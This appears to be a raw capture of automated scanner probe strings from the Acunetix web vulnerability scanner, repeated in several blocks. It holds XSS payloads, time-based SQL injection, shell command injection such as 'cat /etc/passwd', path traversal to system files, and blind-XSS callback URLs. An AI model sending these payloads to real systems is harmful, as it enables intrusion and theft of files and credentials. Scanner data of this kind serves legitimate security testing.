1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(998602)"></g></svg>

response.write(9465136*9478262)

'+response.write(9465136*9478262)+'

1<div style=width:expression(prompt(957614))>

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

WEB-INF/web.xml

"+response.write(9465136*9478262)+"

1<iframe src='data:text/html

1

1

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

1<body onload=prompt(930319)>

1

WEB-INF\web.xml

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(980257)>

1

cat /etc/passwd

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1<img src=xyz OnErRor=prompt(974363)>

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

${99504+100126}

`cat /etc/passwd`

1

../../../../../../../../../../etc/passwd.jpg

-1

1

1<img/src=">" onerror=alert(906924)>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

-1)

1

1

|cat /etc/passwd#

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1))

1some_inexistent_file_with_long_name%00.jpg

1<ScRiPt%20>prompt(924224)</sCripT>

1&n977986=v943734

1

)

1

'|'ld

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&lt

anNWPVtY'

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

"|"ld

'"()

!(()&&!|*|*|

1

1

0sGU9GKj')

testasp.vulnweb.com

/../..//../..//../..//../..//../..//etc/passwd.jpg

\xf6<img acu onmouseover=prompt(931143) //\xf6>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

^(#$!@#$)(()))******

1

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

rG4cnbxu'))

'

1<input autofocus onfocus=prompt(937762)>

1

1

1

1

'

<a href='http://www.acunetix.com'>website security</a>

-1

"

1

/etc/passwd

"

http://hitMJyVxPRZ6a.bxss.me/

1

1

1

1

-1)

${@print(md5(acunetix_wvs_security_test))}

[url=http://www.acunetix.com]website security[/url]

||cat /etc/passwd

1

1

1

acunetix_wvs_invalid_filename

1_QtXv4 <ScRiPt >prompt(938174)</ScRiPt>

&dir

-1))

${@print(md5(acunetix_wvs_security_test))}\

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

'&dir&'

http://www.acunetix.tst

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

comments

1

1

n6gIKbQU'

1

"&dir&"

1

1

'"

1'"()&%<ScRiPt >prompt(928136)</ScRiPt>

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

comments/.

|dir

ckivChjh')

1

'"()&%<ScRiPt >prompt(920050)</ScRiPt>

<!--

'|dir

J5vszbLL'))

1

1

1

file:///etc/passwd

1

1_934529

"|dir

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

acu1435\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1435

1

WEB-INF/web.xml

1

1

1

WEB-INF\web.xml

1

acux2713\xc0\xbez1\xc0\xbcz2a\x90bcxuca2713

1

1

../../../../../../../../../../windows/win.ini

1

1<ScRiPt >prompt(901334)</ScRiPt>

1

1

../../../../../../../../../../boot.ini

1<script>prompt(959260)</script>

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<ScRiPt >prompt(973521)</ScRiPt>

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?980084></ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1

................windowswin.ini

1<ScRiPt >prompt(999846)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<video><source onerror="javascript:prompt(932681)">

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(984979)"></g></svg>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<div style=width:expression(prompt(928474))>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<iframe src='data:text/html

1

1

1

response.write(9143399*9871933)

1<body onload=prompt(966004)>

1

'+response.write(9143399*9871933)+'

1

WEB-INF/web.xml

1

1

&cat /etc/passwd&

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(993158)>

1

WEB-INF\web.xml

"+response.write(9143399*9871933)+"

1<img src=xyz OnErRor=prompt(986652)>

1

'&cat /etc/passwd&'

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<img/src=">" onerror=alert(986668)>

"&cat /etc/passwd&"

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<ScRiPt%20>prompt(960364)</sCripT>

cat /etc/passwd

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

1&lt

`cat /etc/passwd`

1

1

-1

1

1

${99577+99194}

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1)

1

|cat /etc/passwd#

\xf6<img acu onmouseover=prompt(988630) //\xf6>

1

1

1

../../../../../../../../../../etc/passwd.jpg

1&n913771=v929965

'|'ld

1some_inexistent_file_with_long_name%00.jpg

-1))

1

1<input autofocus onfocus=prompt(994416)>

1

)

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

8qJairG0'

"|"ld

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

<a href='http://www.acunetix.com'>website security</a>

1

testasp.vulnweb.com

http://testasp.vulnweb.com/t/xss.html?%00.jpg

qfFeOT8K')

'"()

[url=http://www.acunetix.com]website security[/url]

1

^(#$!@#$)(()))******

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

lOPGhjtG'))

'

'

1

1_nUrxa <ScRiPt >prompt(942459)</ScRiPt>

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

"

-1

1

1

"

1

1

acunetix_wvs_invalid_filename

-1)

||cat /etc/passwd

/etc/passwd

1

http://hitd7D95UAL7t.bxss.me/

1

1

comments

${@print(md5(acunetix_wvs_security_test))}

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

&dir

-1))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

comments

1

1

1

${@print(md5(acunetix_wvs_security_test))}\

o8yJuAOU'

'&dir&'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

comments/.

1

1

http://www.acunetix.tst

0dWcbKuH')

'"

"&dir&"

1

1

1

1'"()&%<ScRiPt >prompt(919622)</ScRiPt>

1

|dir

1

<!--

v0GWSTbP'))

1

1

'"()&%<ScRiPt >prompt(967295)</ScRiPt>

file:///etc/passwd

1

1

'|dir

1

1

1_956050

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

"|dir

1

1

WEB-INF/web.xml

1

1

WEB-INF\web.xml

1

1

1

acu9460\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9460

1

1

../../../../../../../../../../windows/win.ini

1

1

acux6307\xc0\xbez1\xc0\xbcz2a\x90bcxuca6307

1

1

../../../../../../../../../../boot.ini

1<ScRiPt >prompt(927494)</ScRiPt>

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1<script>prompt(911911)</script>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(950442)</ScRiPt>

1

................windowswin.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?942666></ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(957940)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<video><source onerror="javascript:prompt(933895)">

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(910308)"></g></svg>

response.write(9249262*9810489)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

1<div style=width:expression(prompt(919415))>

'+response.write(9249262*9810489)+'

1

&cat /etc/passwd&

1

1<iframe src='data:text/html

"+response.write(9249262*9810489)+"

WEB-INF/web.xml

1

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

1

1<body onload=prompt(976232)>

WEB-INF\web.xml

1

"&cat /etc/passwd&"

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(934130)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

cat /etc/passwd

1

../../../../../../../../../../etc/passwd.jpg

1

1

1<img src=xyz OnErRor=prompt(938559)>

`cat /etc/passwd`

-1

1

1

1

1<img/src=">" onerror=alert(944244)>

${99697+99163}

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

|cat /etc/passwd#

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

-1)

'|'ld

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<ScRiPt%20>prompt(933546)</sCripT>

1

-1))

1&n900848=v969273

1

1some_inexistent_file_with_long_name%00.jpg

1

1&lt

)

1

"|"ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

\xf6<img acu onmouseover=prompt(966681) //\xf6>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

0xkCXoTg'

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

!(()&&!|*|*|

1

1<input autofocus onfocus=prompt(980778)>

NPZyBwVp')

'"()

1

testasp.vulnweb.com

^(#$!@#$)(()))******

1

/etc/passwd

'

<a href='http://www.acunetix.com'>website security</a>

'

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

dI95UA4W'))

1

1

[url=http://www.acunetix.com]website security[/url]

"

"

1

1

-1

1

1

1

||cat /etc/passwd

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1_cWFqi <ScRiPt >prompt(934410)</ScRiPt>

-1)

1

http://hitGqYfo5bHvL.bxss.me/

1

1

1

1

${@print(md5(acunetix_wvs_security_test))}\

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

&dir

-1))

acunetix_wvs_invalid_filename

1

1

1

1

1

yRND67tg'

comments

'&dir&'

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

http://www.acunetix.tst

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

1

'"

"&dir&"

AeOzLsl6')

comments/.

1'"()&%<ScRiPt >prompt(983142)</ScRiPt>

1

1

1

1

1

|dir

76L20ZOU'))

<!--

file:///etc/passwd

1

1

'"()&%<ScRiPt >prompt(944293)</ScRiPt>

1

'|dir

1

1

1

1_920859

/\../\../\../\../\../\../\../etc/passwd

1

1

"|dir

1

1

1

1

WEB-INF/web.xml

1

1

WEB-INF\web.xml

1

1

acu4234\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4234

1

1

../../../../../../../../../../windows/win.ini

1

acux10095\xc0\xbez1\xc0\xbcz2a\x90bcxuca10095

1

1

../../../../../../../../../../boot.ini

1

1<ScRiPt >prompt(923052)</ScRiPt>

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1<script>prompt(905654)</script>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1<ScRiPt >prompt(978417)</ScRiPt>

1

................windowswin.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?936818></ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(935199)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<video><source onerror="javascript:prompt(972984)">

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

response.write(9812946*9827353)

1

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(942722)"></g></svg>

&cat /etc/passwd&

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

'+response.write(9812946*9827353)+'

SomeCustomInjectedHeader:injected_by_wvs

1

1<div style=width:expression(prompt(968224))>

1

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9812946*9827353)+"

1<iframe src='data:text/html

1

../../../../../../../../../../etc/passwd

"&cat /etc/passwd&"

1

1

WEB-INF/web.xml

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(927002)>

1

cat /etc/passwd

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

WEB-INF\web.xml

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

1

1

`cat /etc/passwd`

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(969158)>

../../../../../../../../../../etc/passwd.jpg

-1

1

1

1

1

1

1

-1)

1<img src=xyz OnErRor=prompt(932482)>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

|cat /etc/passwd#

1

1

1

1

-1))

${99068+99206}

'|'ld

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img/src=">" onerror=alert(978426)>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

)

CZVmkSiG'

1

1&n980506=v925010

1<ScRiPt%20>prompt(910526)</sCripT>

1

1some_inexistent_file_with_long_name%00.jpg

"|"ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

!(()&&!|*|*|

1

1&lt

apB2Vge6')

1

'"()

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

^(#$!@#$)(()))******

http://testasp.vulnweb.com/t/xss.html?%00.jpg

\xf6<img acu onmouseover=prompt(975979) //\xf6>

'

1

jAarMjHP'))

'

1

1<input autofocus onfocus=prompt(942445)>

1

1

/etc/passwd

testasp.vulnweb.com

-1

1

"

"

1

1

1

1

<a href='http://www.acunetix.com'>website security</a>

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}

-1)

http://hitPYdemoAKAp.bxss.me/

1

acunetix_wvs_invalid_filename

1

&dir

[url=http://www.acunetix.com]website security[/url]

'&dir&'

-1))

1

${@print(md5(acunetix_wvs_security_test))}\

1

comments

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1_Mq30C <ScRiPt >prompt(902601)</ScRiPt>

1

"&dir&"

XRJT5m1j'

1

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

1

comments/.

http://www.acunetix.tst

|dir

PtWESbUj')

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

'"

1

1

'|dir

1'"()&%<ScRiPt >prompt(938487)</ScRiPt>

tncE54zQ'))

1

1

1

"|dir

1

<!--

1

1

'"()&%<ScRiPt >prompt(945861)</ScRiPt>

file:///etc/passwd

1

1

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

1_983456

1

1

1

1

1

WEB-INF/web.xml

1

1

WEB-INF\web.xml

1

1

1

../../../../../../../../../../windows/win.ini

acu5392\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5392

1

../../../../../../../../../../boot.ini

1

1

acux10780\xc0\xbez1\xc0\xbcz2a\x90bcxuca10780

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<ScRiPt >prompt(924110)</ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<script>prompt(989919)</script>

1

................windowswin.ini

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(953574)</ScRiPt>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?929491></ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(986488)</ScRiPt>

response.write(9230735*9113303)

1

1

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<video><source onerror="javascript:prompt(972703)">

1

&cat /etc/passwd&

'+response.write(9230735*9113303)+'

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(979018)"></g></svg>

SomeCustomInjectedHeader:injected_by_wvs

1

1

"+response.write(9230735*9113303)+"

'&cat /etc/passwd&'

1<div style=width:expression(prompt(976294))>

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

1

WEB-INF/web.xml

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1<iframe src='data:text/html

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

"&cat /etc/passwd&"

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1<body onload=prompt(972389)>

WEB-INF\web.xml

1

1

../../../../../../../../../../etc/passwd.jpg

cat /etc/passwd

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

-1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(984284)>

1

`cat /etc/passwd`

${99114+99693}

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<img src=xyz OnErRor=prompt(905775)>

|cat /etc/passwd#

1

1

-1)

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

)

/../..//../..//../..//../..//../..//etc/passwd.jpg

1&n907721=v997561

1

1<img/src=">" onerror=alert(945703)>

'|'ld

-1))

1some_inexistent_file_with_long_name%00.jpg

1

!(()&&!|*|*|

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1<ScRiPt%20>prompt(970495)</sCripT>

"|"ld

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

8csE2vYK'

/etc/passwd

^(#$!@#$)(()))******

1

'"()

1&lt

a9O0vdmm')

testasp.vulnweb.com

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

1

\xf6<img acu onmouseover=prompt(994009) //\xf6>

1

'

1

"

1

cILuj6IM'))

1

1

${@print(md5(acunetix_wvs_security_test))}

"

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1<input autofocus onfocus=prompt(933663)>

1

1

1

1

-1

1

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

http://hit1UwZp7NUak.bxss.me/

<a href='http://www.acunetix.com'>website security</a>

1

1

-1)

acunetix_wvs_invalid_filename

1

&dir

1

1

[url=http://www.acunetix.com]website security[/url]

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

comments

1

-1))

1

1

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1_FUjC2 <ScRiPt >prompt(989447)</ScRiPt>

'&dir&'

comments/.

gQFALJgy'

http://www.acunetix.tst

1

'"

1

WhAZQYoB')

1

"&dir&"

file:///etc/passwd

1

1

1

1

<!--

1

orfPZyWd'))

1

1

/\../\../\../\../\../\../\../etc/passwd

|dir

1'"()&%<ScRiPt >prompt(904560)</ScRiPt>

1

1

1

1

1

'"()&%<ScRiPt >prompt(966578)</ScRiPt>

'|dir

1

WEB-INF/web.xml

1

1

1

1

WEB-INF\web.xml

"|dir

1_913628

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

../../../../../../../../../../boot.ini

1

acu5630\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5630

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

acux7136\xc0\xbez1\xc0\xbcz2a\x90bcxuca7136

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(951547)</ScRiPt>

1

................windowswin.ini

1

1

1<script>prompt(979811)</script>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<ScRiPt >prompt(978773)</ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?976903></ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<ScRiPt >prompt(931860)</ScRiPt>

response.write(9367196*9916643)

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

'+response.write(9367196*9916643)+'

1<video><source onerror="javascript:prompt(982311)">

1

1

1

&cat /etc/passwd&

"+response.write(9367196*9916643)+"

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(939700)"></g></svg>

SomeCustomInjectedHeader:injected_by_wvs

1

1

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

WEB-INF/web.xml

1

SomeCustomInjectedHeader:injected_by_wvs

1<div style=width:expression(prompt(912398))>

1

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

WEB-INF\web.xml

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1<iframe src='data:text/html

1

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

../../../../../../../../../../etc/passwd.jpg

1

1

1

1

cat /etc/passwd

1<body onload=prompt(996924)>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

1

1

`cat /etc/passwd`

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(922544)>

1

${100289+100028}

1

-1

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

|cat /etc/passwd#

1<img src=xyz OnErRor=prompt(932843)>

1

-1)

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1&n983907=v935782

1<img/src=">" onerror=alert(906987)>

'|'ld

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

)

-1))

1

1

1some_inexistent_file_with_long_name%00.jpg

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1<ScRiPt%20>prompt(973095)</sCripT>

"|"ld

1

TfpmU0Ia'

!(()&&!|*|*|

'"()

1

1

1&lt

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/etc/passwd

'

1

TBCwD6jw')

^(#$!@#$)(()))******

http://testasp.vulnweb.com/t/xss.html?%00.jpg

testasp.vulnweb.com

'

\xf6<img acu onmouseover=prompt(915937) //\xf6>

1

1

rRQ5L46z'))

1

"

1

-1

1<input autofocus onfocus=prompt(909287)>

"

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

http://hitYQmaQ5JUGl.bxss.me/

${@print(md5(acunetix_wvs_security_test))}

1

-1)

<a href='http://www.acunetix.com'>website security</a>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

acunetix_wvs_invalid_filename

1

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

[url=http://www.acunetix.com]website security[/url]

-1))

1

1

1

comments

1

&dir

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

5U7gPc4B'

1_DPojS <ScRiPt >prompt(976915)</ScRiPt>

1

comments

1

1

file:///etc/passwd

hC7GXoPG')

'&dir&'

1

1

1

1

1

http://www.acunetix.tst

comments/.

"&dir&"

p5ZumDvz'))

/\../\../\../\../\../\../\../etc/passwd

'"

1'"()&%<ScRiPt >prompt(949276)</ScRiPt>

1

1

1

1

1

1

|dir

1

'"()&%<ScRiPt >prompt(967097)</ScRiPt>

<!--

WEB-INF/web.xml

1

1

'|dir

1

1_989375

1

WEB-INF\web.xml

1

1

1

1

"|dir

1

../../../../../../../../../../windows/win.ini

1

1

1

1

acu9925\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9925

../../../../../../../../../../boot.ini

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

acux5053\xc0\xbez1\xc0\xbcz2a\x90bcxuca5053

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(992562)</ScRiPt>

1

1

1

................windowswin.ini

1<script>prompt(924473)</script>

1

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(917828)</ScRiPt>

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?929698></ScRiPt>

1

1

1

